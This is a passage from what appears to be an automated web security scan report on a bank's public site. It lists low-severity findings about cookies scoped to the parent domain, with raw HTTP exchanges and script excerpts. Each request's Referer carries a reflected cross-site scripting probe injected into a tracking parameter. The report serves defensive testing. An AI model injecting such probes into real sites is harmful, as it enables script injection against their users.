Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 403
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

$('#btn_continue').click(function()
{
if ($('#promo').attr('value').length == 9)
{
var itc = $.cookie('itc');
if (itc.length == 25)
{
$.cookie('tmp_offer',itc.substr(23,2)
...[SNIP]...

9.27. http://www.capitalone.com/js/component/portal_swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_swfobject.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_swfobject.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 10223
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="ob
...[SNIP]...

9.28. http://www.capitalone.com/js/component/portal_utilitynav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_utilitynav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/component/portal_utilitynav.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:35 GMT
Server: Apache
Set-Cookie: v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 178
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Adds the class "last" to the last item in the
// utility links to remove the right border
$(document).ready(function(){
$('#utility-links li:last').addClass('last');
});

9.29. http://www.capitalone.com/js/global/cof/portal_header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_header.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/cof/portal_header.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 32517
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

Cof = Cof || {};

Cof.Header = function() {

var c1server = window.location.protocol + "//" + window.location.hostname;

if(window.location.port != null){
c1server = c1server + ":" + win
...[SNIP]...

9.30. http://www.capitalone.com/js/global/cof/portal_headerFooter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_headerFooter.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/cof/portal_headerFooter.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 30933
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

var xmlHttpReq;
var zipCodeValue=null;
var regionValue=null;
var protocol= window.location.protocol + "//";

function getXmlHttpRequestObject()
{
       if (window.XMLHttpRequest)
       {
           return
...[SNIP]...

9.31. http://www.capitalone.com/js/global/portal_cof.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_cof.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_cof.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 10 Mar 2011 18:09:05 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 103153
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// JavaScript Document
var Cof = Cof || {};

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.

...[SNIP]...

9.32. http://www.capitalone.com/js/global/portal_footnote.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_footnote.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_footnote.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4130
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* By Dara Keo
// This relabels and reorders all disclaimers and footnotes //
*/
/*
$(document).ready(function(){
   var fnCount = 0;
   var fnHold = "*";
   var footnoteData = new Array();
   var is
...[SNIP]...

9.33. http://www.capitalone.com/js/global/portal_global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/global/portal_global.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 6778
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Opens a pop-up when the function is called.
function openPopUp(url, navStatus, name, height, width){
//Opens the popup window.
var newwindow;
newwindow = window.open(url, name, 'h
...[SNIP]...

9.34. http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/LivePerson_USC_VS.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveperson/LivePerson_USC_VS.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2013
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

function lpVSLoadTrackingImage(vsTrackAction)
{
var lpVSTrackingImg = new Image();
lpVSTrackingImg.src="https://www.capitalone.com/images/https-common/tracker.gif?Log=1&pn=" + vsTrackAction;
}

...[SNIP]...

9.35. http://www.capitalone.com/js/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/mtagconfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveperson/mtagconfig.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5704
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

// Date last modified = 20100105
// Modified by = Hadar Blutrich

var lpMTagConfig = {
'lpServer' : 'sales.liveperson.net',
'lpNumber' : '32528459',
'lpProtocol' : (document.location.toString().inde
...[SNIP]...

9.36. http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:36 GMT
Server: Apache
Set-Cookie: v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:21:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1605
Content-Type: application/x-javascript
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/* OnlineOpinion (F3cS,en-US) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var O_pth='/js/onl
...[SNIP]...

9.37. http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_engine.js

Issue detail

